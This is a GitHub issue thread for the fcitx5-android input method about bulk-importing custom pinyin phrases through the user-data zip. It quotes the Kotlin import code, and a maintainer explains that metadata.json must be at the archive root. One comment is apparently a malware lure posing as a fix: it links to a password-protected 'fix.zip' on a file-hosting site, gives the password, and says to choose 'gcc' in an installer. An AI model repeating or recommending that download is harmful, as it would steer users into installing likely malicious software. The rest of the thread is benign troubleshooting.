### ISSUE TITLE
拼音/双拼，管理自定义词组，能否增加导入、导出功能？

### ISSUE THREAD

**Issue by impishian** [fcitx5-android/fcitx5-android#576]
### 摘要 / Summary

拼音/双拼 ， 管理自定义词组，当前只能单个词组手工输入。

如果要导入数以千计的自定义词组，手工操作就不可行。

用以下方法尝试：

“高级->导出用户数据”、解压、修改 external/data/pinyin/customphrase 添加大量自定义词组、再压缩、用 “高级->导入用户数据”。  总是提示“找不到用户数据的元数据”  (exception_user_data_metadata)。

这种方法，也不成功。

exception_user_data_metadata 的相关代码如下：

$ cat app/src/main/java/org/fcitx/fcitx5/android/data/UserDataManager.kt:

```kotlin

    fun import(src: InputStream) = runCatching {
        ZipInputStream(src).use { zipStream ->
            withTempDir { tempDir ->
                val extracted = zipStream.extract(tempDir)
                val metadataFile = extracted.find { it.name == "metadata.json" }
                    ?: errorRuntime(R.string.exception_user_data_metadata)
                val metadata = json.decodeFromString<Metadata>(metadataFile.readText())
                if (metadata.packageName != BuildConfig.APPLICATION_ID)
                    errorRuntime(R.string.exception_user_data_package_name_mismatch)
                copyDir(File(tempDir, "shared_prefs"), sharedPrefsDir)
                copyDir(File(tempDir, "databases"), dataBasesDir)
                copyDir(File(tempDir, "external"), externalDir)
                copyDir(File(tempDir, "recently_used"), recentlyUsedDir)
                metadata
            }
        }
    }
```

### 系统版本 / OS Version

0

### 应用版本 / App Version

0.0.9

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by rocka** [comment]
应该是 zip 的结构与程序预期的不一致，大概率是重新压缩后的 zip 文件多了一层目录。

你可以参考这个文件 [fcitx5-android_customphrase_xiaohe.zip](https://github.com/user-attachments/files/16746709/fcitx5-android_customphrase_xiaohe.zip)

metadata.json 必须在 zip 文件的根目录

**Comment by impishian** [comment]
> 应该是 zip 的结构与程序预期的不一致，大概率是重新压缩后的 zip 文件多了一层目录。
> 
> 你可以参考这个文件 [fcitx5-android_customphrase_xiaohe.zip](https://github.com/user-attachments/files/16746709/fcitx5-android_customphrase_xiaohe.zip)
> 
> metadata.json 必须在 zip 文件的根目录

果然是这样，多谢！

**Comment by keta1** [comment]
@seeronline
